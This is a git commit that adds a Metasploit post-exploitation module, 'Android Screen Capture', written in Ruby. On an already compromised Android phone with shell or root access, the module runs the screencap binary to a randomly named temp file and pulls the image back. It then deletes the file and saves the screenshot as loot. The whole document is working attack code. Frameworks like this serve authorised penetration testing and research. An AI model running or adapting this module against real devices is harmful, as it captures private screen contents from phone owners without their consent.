add screencap for android

2015-05-25 13:36:48 +01:00 · 2015-05-25 13:36:48 +01:00 · a04f70eb53
parent f953dc08d9
commit a04f70eb53
1 changed files with 73 additions and 0 deletions
--- a/modules/post/android/capture/screen.rb
+++ b/modules/post/android/capture/screen.rb
@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Android Screen Capture',
+        'Description'   => %q{
+          This module takes a screenshot of the target phone.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'timwr' ],
+        'Platform'      => [ 'android' ],
+        'SessionTypes'  => [ 'shell', 'meterpreter' ]
+      ))
+
+    register_options(
+      [
+        OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/data/local/tmp/']),
+        OptString.new('EXE_PATH', [true, 'Path to remote screencap executable', '/system/bin/screencap'])
+      ], self.class)
+  end
+
+  def run
+    id = cmd_exec('id')
+    unless id =~ /root/ or id =~ /shell/
+      print_error("This module requires shell or root permissions")
+      return
+    end
+
+    exe_path = datastore['EXE_PATH']
+    tmp_path = datastore['TMP_PATH']
+    if not file?(exe_path)
+      print_error("Aborting, screencap binary not found.")
+      return
+    end
+
+    begin
+      file = "#{tmp_path}/#{Rex::Text.rand_text_alpha(7)}.png"
+      cmd_exec("#{exe_path} -p #{file}")
+      print_good("Downloading screenshot...")
+      data = read_file(file)
+      file_rm(file)
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      print_error("Error taking the screenshot")
+      vprint_error("#{e.class} #{e} #{e.backtrace}")
+      return
+    end
+
+    unless data
+      print_error("No data for screenshot")
+      return
+    end
+
+    begin
+      fn = "screenshot.png"
+      location = store_loot("screen_capture.screenshot", "image/png", session, data, fn, "Screenshot")
+      print_good("Screenshot saved at #{location}")
+    rescue ::IOError, ::Errno::ENOENT => e
+      print_error("Error storing screenshot")
+      vprint_error("#{e.class} #{e} #{e.backtrace}")
+      return
+    end
+  end
+end